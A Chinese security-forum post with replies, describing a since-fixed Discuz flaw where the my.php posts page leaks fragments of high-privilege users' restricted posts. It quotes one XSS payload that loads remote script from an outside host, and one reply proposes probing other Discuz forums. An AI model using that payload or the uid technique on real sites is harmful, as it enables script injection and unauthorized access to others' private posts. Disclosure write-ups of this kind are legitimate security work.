看完0xShe师傅分享的越权,我又不死心瞅了瞅论坛的功能,诶,好巧不巧,又发现了一个信息泄露,还挺严重的。
其实挺简单的,我没测试普通权限,感觉是大家都可以操作。问题出在个人中心的主题页面,就这个地址:
https://www.t00ls.com/my.php?item=posts&uid=xxx
只要找到高权限的文章作者,获取其uid,然后拼接上面的url,访问即可。比如从WEB代码审计板块可以找到不少255权限的帖子,
然后访问拼接后的url即可
这里是否会泄漏poc,有偶然成分,它泄漏的字符较少,如果发帖人直接就贴poc那铁定gg。 我举个例子:
有志者、事竟成,破釜沉舟
<Img Src=//x.is OnLoad=import(src)>
打赏/拍砖记录
- 0xShe 2023-06-20 16:01:39
打赏 +1 TuBi:细啊细啊
好像注册会员以上才有的权限,也是DZ的原生问题,已经修复。
这波举一反三是学到了,现场学思路现场挖,跟src看报告出货一样
这么说其他dz论坛有这个问题了。是不是可以看看其他论坛有没有好东西